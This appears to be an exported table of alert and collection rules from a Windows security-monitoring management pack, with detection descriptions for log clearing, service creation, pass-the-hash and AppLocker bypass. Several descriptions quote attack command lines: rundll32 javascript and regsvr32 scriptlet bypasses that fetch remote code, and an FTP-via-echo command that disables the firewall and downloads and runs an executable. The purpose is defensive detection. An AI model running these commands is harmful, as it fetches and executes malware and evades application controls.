| SecurityMonitoringMP.Event.SecurityLogCleared | Security Monitoring: Security Log was cleared | Clearing the security log is something an attacker will do to cover their tracks. By default, logs cycle. If the log has been cleared, this should be investigated. | SecurityMonitoringMP.Event.SecurityLogCleared | Microsoft.Windows.Server.OperatingSystem | Alert | False | | | 0 | 1102 | Microsoft-Windows-Eventlog | True | Error | Normal | True | Security |
| SecurityMonitoringMP.Event.ServiceCreatedonMemberServer | Security Monitoring: A service was created on a member server | I would consider enabling this rule for any production server that is in a steady state. No services should be created at this point, and any event where one is created would be worthy of investigation. | SecurityMonitoringMP.Event.ServiceCreatedonMemberServer | Microsoft.Windows.Server.OperatingSystem | Alert | False | | | 0 | 0 | | True | Error | Normal | True | System |
| SecurityMonitoringMP.Event.ServiceKnownThreat | Security Monitoring: Service associated with a known threat was created on a member server | This is a special case of event ID 7045 targeting the names of services that are created by known tools such as Windows Credential Editor, PsExec, etc. If you turned on the generic 7045 rule, this alert should be disabled as it will generate duplicate events. | SecurityMonitoringMP.Event.ServiceKnownThreat | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 7045 | | True | Error | Normal | True | System |
| SecurityMonitoringMP.Event.SmartCardDisabled | Security Monitoring: A Smart Card has been Disabled to Allow for Interactive Logon | Someone has purposely deselected the option to disable smart card authentication for the account. Verify that this has in fact been approved. | SecurityMonitoringMP.Event.SmartCardDisabled | Microsoft.Windows.Server.DC.Computer | Alert | True | | | 0 | 4738 | | True | Error | Normal | True | Security |
| SecurityMonitoringMP.Event.SoftwareInstallOnServer | Security Monitoring: Software was Installed on a Server | This rule looks for 11707 events in the application log and alerts accordingly. Note that patches will likely be flagged by this rule, so it should be turned on if there is a good maintenance process in place. | SecurityMonitoringMP.Event.SoftwareInstallOnServer | Microsoft.Windows.Server.OperatingSystem | Alert | False | | | 0 | 11707 | MsiInstaller | True | Warning | Normal | True | Application |
| SecurityMonitoringMP.Event.SoftwareRemovedFromServer | Security Monitoring: Software was Removed from a Server | This may not be a security event and is disabled by default. It could be enabled and edited to target security software in customer environments. | SecurityMonitoringMP.Event.SoftwareRemovedFromServer | Microsoft.Windows.Server.OperatingSystem | Alert | False | | | 0 | 11724 | MsiInstaller | True | Warning | Normal | True | Application |
| SecurityMonitoringMP.Event.SystemLogCleared | Security Monitoring: The System Log was cleared | | SecurityMonitoringMP.Event.SystemLogCleared | Microsoft.Windows.Server.OperatingSystem | Alert | False | | | 0 | 104 | Microsoft-Windows-Eventlog | True | Error | Normal | True | System |
SecurityMonitoringMP.Event.SystemPoweredOffSecurity Monitoring: A system has been powered offThis is not necessarily a security event, and as such it can generate noise and is off by default. SecurityMonitoringMP.Event.SystemPoweredOffMicrosoft.Windows.Server.OperatingSystemAlertFalse01074User32TrueWarningNormalTrueSystem
SecurityMonitoringMP.Event.SystemRestartedSecurity Monitoring: A system was restartedThis is not necessarily a security event, and as such this is disabled by default, but it can be useful in tracking security events or bad business practice.SecurityMonitoringMP.Event.SystemRestartedMicrosoft.Windows.Server.OperatingSystemAlertFalse01074User32TrueWarningNormalTrueSystem
SecurityMonitoringMP.Event.UnexpectedShutdownSecurity Monitoring: Unexpected System ShutdownThis checks the system log for unexpected shutdown events and generates an alert. While not necessarily related to an attack, these events are potentially worth investigating for health reasons in the environment.SecurityMonitoringMP.Event.UnexpectedShutdownMicrosoft.Windows.Server.OperatingSystemAlertFalse00TrueWarningNormalTrueSystem
SecurityMonitoringMP.EventCollection.4672Security Monitoring Collection: Event ID 4672SecurityMonitoringMP.EventCollection.4672Microsoft.Windows.Server.OperatingSystemEventCollectionFalse00FalseTrue
SecurityMonitoringMP.EventCollection.BatchLogonSecurity Monitoring Collection: Event ID 4624 Logon Type 4SecurityMonitoringMP.EventCollection.BatchLogonMicrosoft.Windows.Server.OperatingSystemEventCollectionTrue00FalseTrue
SecurityMonitoringMP.EventCollection.GoldenTicketSecurity Monitoring Event Collection: Event ID 4769 result 0x1FSecurityMonitoringMP.EventCollection.GoldenTicketMicrosoft.Windows.Server.DC.ComputerEventCollectionTrue00FalseTrue
SecurityMonitoringMP.EventCollection.SpecialGroupLogonSecurity Monitoring Collection: Event ID 4694SecurityMonitoringMP.EventCollection.SpecialGroupLogonMicrosoft.Windows.Server.OperatingSystemEventCollectionTrue00FalseTrue
SecurityMonitoringMP.ForwardedEvents.4688.SuspiciousApplockerJavaSecurity Monitoring Forwarded Events: A suspicious process creation (AppLocker bypass) was executedTo bypass restrictive Applocker policies, attackers will implement a specially crafted commandline which makes use of Windows native exe "Rundll32.exe" (required by Windows to load and run code in DLLs and therefore not blocked by Applocker). Rundll32.exe can be used to call javascript to execute arbitrary commands which are not blocked by restrictive Applocker policies. The rundll32.exe syntax is as follows: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";<code> Events of this nature need to be investigatedSecurityMonitoringMP.ForwardedEvents.4688.SuspiciousApplockerJavaWindowsEventCollectorDiscovery.EventLogCollectorServerAlertTrue04688TrueErrorNormalTrueForwardedEvents
SecurityMonitoringMP.ForwardedEvents.4688.SuspiciousApplockerRegsvrSecurity Monitoring Forwarded Events: A suspicious process creation (AppLocker bypass using regsvr32) was execuitedAppLocker Bypass Techniques using Regsvr32.exe (greg) Note: The following is already contained in SCUBA_RULE_Applocker_Bypass Examples: regsvr32 /s /n /u /i:file.sct scrobj.dll regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll regsvr32 /s /n /u /i:http://server/file.jpg scrobj.dllSecurityMonitoringMP.ForwardedEvents.4688.SuspiciousApplockerRegsvrWindowsEventCollectorDiscovery.EventLogCollectorServerAlertTrue04688TrueErrorNormalTrueForwardedEvents
SecurityMonitoringMP.ForwardedEvents.4688.SuspiciousCMDSecurity Monitoring Forwarded Events: A suspicious process creation (cmd) was executedThese events should be investigated. We are tracking 4688 events with known strings often found in malicious scripts. While it is possible that there are normal conditions for this rule, any alert should be investigated immediately.SecurityMonitoringMP.ForwardedEvents.4688.SuspiciousCMDWindowsEventCollectorDiscovery.EventLogCollectorServerAlertTrue04688TrueErrorNormalTrueForwardedEvents
SecurityMonitoringMP.ForwardedEvents.4688.SuspiciousFTPCommandSecurity Monitoring Forwarded Events: A suspicious process creation (FTP script execution via echo command) was executedDetection of FTP Scripts created via the Echo command: Based on several cases where compromised SQLService was used and SQL Agent Jobs were created to invoke ‘xp_cmdshell’ which in turn created and launched FTP scripts to download and run malware… Example of the commandline used to create and run ftp scripts: "Command Line ": "\"\"\"C:\\Windows\\System32\\cmd.exe\"\" /c \"\"net1 stop sharedaccess&echo open 222.186.58.12 >> love.txt&echo 123>> love.txt&echo 123>> love.txt&echo binary >> love.txt&echo get r.exe >> love.txt&echo bye >> love.txt&ftp -s:love.txt&p -s:love.txt&r.exe&r.exe&del love.txt /q /f&exit\"\"\" This type of event is rare and should be investigatedSecurityMonitoringMP.ForwardedEvents.4688.SuspiciousFTPCommandWindowsEventCollectorDiscovery.EventLogCollectorServerAlertTrue04688TrueErrorNormalTrueForwardedEvents
SecurityMonitoringMP.ForwardedEvents.4688.SuspiciousRegSecurity Monitoring Forwarded Events: A suspicious process creation (registry) was executedThis rule inventories 4688 events and flags alerts for manually added registry keys. These are rare events and should be investigated when they appear.SecurityMonitoringMP.ForwardedEvents.4688.SuspiciousRegWindowsEventCollectorDiscovery.EventLogCollectorServerAlertTrue04688TrueErrorNormalTrueForwardedEvents
SecurityMonitoringMP.ForwardedEvents.4688.SuspiciousWindowsPositionSecurity Monitoring Forwarded Events: A suspicious process creation (malicious use of WindowPosition with PowerShell) was executedSee: https://technet.microsoft.com/en-us/library/cc957410.aspx The WindowPosition value specifies the position of the command window on the user's screen. The value of this entry is an 8-byte hexadecimal value. The first four bytes (high word) represent the position of the window on the X (horizontal) axis. The last four bytes (low word) represent the position of the window on the Y (vertical) axis. When the WindowPosition value is set to 201329664, (Hex: 0x0c00 0c00) this places the console in a non-visible section of the user’s screen (where X axis=0c00 and the Y axis=0c00) in an area that is hidden from view below the visible start menu/taskbar Other console apps that can be modified to make the screen non-visible SecurityMonitoringMP.ForwardedEvents.4688.SuspiciousWindowsPositionWindowsEventCollectorDiscovery.EventLogCollectorServerAlertTrue04688TrueErrorNormalTrueForwardedEvents
SecurityMonitoringMP.ForwardedEvents.CredentialSwapSecurity Monitoring Forwarded Events: Potential Credential Swap in ProgressSecurityMonitoringMP.ForwardedEvents.CredentialSwapWindowsEventCollectorDiscovery.EventLogCollectorServerAlertTrue00TrueErrorNormalTrueForwardedEvents
SecurityMonitoringMP.ForwardedEvents.LocalUserCreatedDeletedSecurity Monitoring Forwarded Events: Local User Created or Deleted in Administrator Security GroupSecurityMonitoringMP.ForwardedEvents.LocalUserCreatedDeletedWindowsEventCollectorDiscovery.EventLogCollectorServerAlertTrue00TrueErrorNormalTrueForwardedEvents
SecurityMonitoringMP.ForwardedEvents.ProhibitedAppSecurity Monitoring Forwarded Events: Prohibited App in UseSecurityMonitoringMP.ForwardedEvents.ProhibitedAppWindowsEventCollectorDiscovery.EventLogCollectorServerAlertTrue08003TrueErrorNormalTrueForwardedEvents
SecurityMonitoringMP.ForwardedEvents.PtHTier2Security Monitoring Forwarded Events: Possible PtH Attack in Progress Against Tier 2SecurityMonitoringMP.ForwardedEvents.PtHTier2WindowsEventCollectorDiscovery.EventLogCollectorServerAlertFalse00TrueErrorNormalTrueForwardedEvents
SecurityMonitoringMP.ForwardedEvents.SecurityLogClearedSecurity Monitoring Forwarded Events: Security log cleared on a server configured to forward eventsSecurityMonitoringMP.ForwardedEvents.SecurityLogClearedWindowsEventCollectorDiscovery.EventLogCollectorServerAlertTrue01102Microsoft-Windows-EventlogTrueErrorNormalTrueForwardedEvents
SecurityMonitoringMP.ForwardedEvents.ServiceCreationSecurity Monitoring Forwarded Events: Service Created on systemSecurityMonitoringMP.ForwardedEvents.ServiceCreationWindowsEventCollectorDiscovery.EventLogCollectorServerAlertFalse00TrueErrorNormalTrueForwardedEvents
SecurityMonitoringMP.ForwardedEvents.ServiceCreationKnownThreatsSecurity Monitoring Forwarded Events: Service associated with a known threat was created on a forwarding computerSecurityMonitoringMP.ForwardedEvents.ServiceCreationKnownThreatsWindowsEventCollectorDiscovery.EventLogCollectorServerAlertTrue07045TrueErrorNormalTrueForwardedEvents
SecurityMonitoringMP.ForwardedEvents.SpecialGroupLogonSecurity Monitoring Forwarded Events: Special Group logon eventSecurityMonitoringMP.ForwardedEvents.SpecialGroupLogonWindowsEventCollectorDiscovery.EventLogCollectorServerAlertTrue00TrueErrorNormalTrueForwardedEvents
SecurityMonitoringMP.ForwardedEvents.SystemLogClearedSecurity Monitoring Forwarded Events: System Log was ClearedSecurityMonitoringMP.ForwardedEvents.SystemLogClearedWindowsEventCollectorDiscovery.EventLogCollectorServerAlertTrue0104Microsoft-Windows-EventlogTrueErrorNormalTrueForwardedEvents
SecurityMonitoringMP.GPOMonitoring.EventAndScript.RuleGPO Change Event then run correlation script RuleSecurityMonitoringMP.GPOMonitoring.EventAndScript.RuleMicrosoft.Windows.Server.DC.ComputerCustomTrue00TrueErrorNormalTrue
SecurityMonitoringMP.Pth.CredentialSwapSecurity Monitoring: Potential Credential Swap in ProgressSecurityMonitoringMP.Pth.CredentialSwapMicrosoft.Windows.Server.OperatingSystemAlertTrue00TrueErrorNormalTrueSecurity
SecurityMonitoringMP.Pth.PtHAgainstDCSecurity Monitoring: Possible PtH attack in progress (successful) against DCSecurityMonitoringMP.Pth.PtHAgainstDCMicrosoft.Windows.Server.DC.ComputerAlertFalse00TrueErrorNormalTrueSecurity
SecurityMonitoringMP.Pth.PtHAgainstTier1Security Monitoring: Possible PtH Attack in Progress against tier 1SecurityMonitoringMP.Pth.PtHAgainstTier1Microsoft.Windows.Server.OperatingSystemAlertFalse00TrueErrorNormalTrueSecurity
SecurityMonitoringMP.ThreatHunt.BatchLogonInUseSecurity Monitoring Threat Hunting: Batch Logon in useThis rule checks the security log for event ID 4624 Logon Type 4. Logon type 4 is a batch logon, which essentially means that there are exposed credentials on this system. Investigation should determine which application is using said credentials. Once the applications are remediated, batch logons can be disabled, making your environment more secure.SecurityMonitoringMP.ThreatHunt.BatchLogonInUseMicrosoft.Windows.Server.OperatingSystemAlertFalse00TrueErrorNormalTrueSecurity
SecurityMonitoringMP.ThreatHunt.SpecialGroupLogonSecurity Monitoring Threat Hunting: Special Group logon eventThis rule will not generate any noise under normal environment. It requires special groups auditing turned on via GPO as well as the specific memberships to be targeted in the registry. If you've done these tasks, this monitor will alert every time a user that is a member of these SecurityMonitoringMP.ThreatHunt.SpecialGroupLogonMicrosoft.Windows.Server.OperatingSystemAlertTrue00TrueErrorNormalTrueSecurity